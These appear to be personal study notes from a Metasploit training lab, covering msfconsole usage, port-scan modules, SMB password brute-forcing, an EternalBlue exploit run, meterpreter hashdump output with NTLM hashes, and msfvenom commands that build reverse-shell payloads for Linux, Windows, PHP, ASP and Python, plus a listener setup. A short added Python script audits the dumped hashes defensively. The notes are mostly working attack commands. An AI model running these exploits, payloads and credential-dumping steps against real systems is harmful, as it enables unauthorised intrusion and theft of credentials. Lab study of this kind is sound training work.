search
search type:auxiliary telnet

info

RHOSTS: the remote host(s)

It can also be read from a file

LHOST: the local IP
LPORT: the port the reverse shell connects back to

setg is the global version of set

background sends the session to the background
or Ctrl + Z

sessions lists the existing sessions
sessions -i 1 switches to session 1

Scanning

search portscan

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator

use scanner/smb/smb_login
set RHOSTS 10.10.131.175
set username jenny
set pass_file /tmp/aaaaa
run

Result: Success: '.\jenny:95'
The password is 95
Oh, sorry, the user is penny

leo1234

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.32.117
RHOSTS => 10.10.32.117
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.17.6.173
lhost => 10.17.6.173
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

You still need to set the payload

EternalBlue

search -f flag.txt

hashdump dumps the password hashes

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::

These can be taken to a hash-cracking tool
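As an added example (not part of the original notes), a small Python audit of hashdump's pwdump-format output, using the three lines above as a constructed sample: it flags accounts whose NT hash is the well-known empty-string hash, accounts that still store a real LM hash, and accounts that share one NT hash (password reuse). hashdump does not show whether an account is disabled, so a flagged entry still has to be checked against the account's status.

```python
import re

# Constructed sample in the pwdump format that meterpreter's hashdump prints:
# user:RID:LM hash:NT hash:::
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
"""

# Well-known constants: the LM field when no LM hash is stored, and the NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)


def parse_pwdump(text):
    """Return a list of dicts (user, rid, lm, nt), one per well-formed pwdump line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a pwdump record: {line!r}")
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["lm"] = d["lm"].lower()
        d["nt"] = d["nt"].lower()
        entries.append(d)
    return entries


def audit(entries):
    """Return (account, finding) pairs a defender would act on:
    lm_present    - a real LM hash is stored (weak legacy hash; LM storage should be disabled)
    empty_password - the NT hash is the hash of the empty string
    shared_nt      - several accounts use the same NT hash, i.e. the same password
    """
    findings = []
    nt_owners = {}
    for e in entries:
        nt_owners.setdefault(e["nt"], []).append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "lm_present"))
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty_password"))
    for nt, users in nt_owners.items():
        if len(users) > 1 and nt != EMPTY_NT:  # empty passwords are already reported above
            findings.append((",".join(sorted(users)), "shared_nt"))
    return findings
```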

Generating payloads

msfvenom

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64

Linux Executable and Linkable Format (ELF)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

Then transfer the generated payload to the target machine

On the attacking machine, run:

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 10.17.6.173
set lport 9999
run


run post/linux/gather/hashdump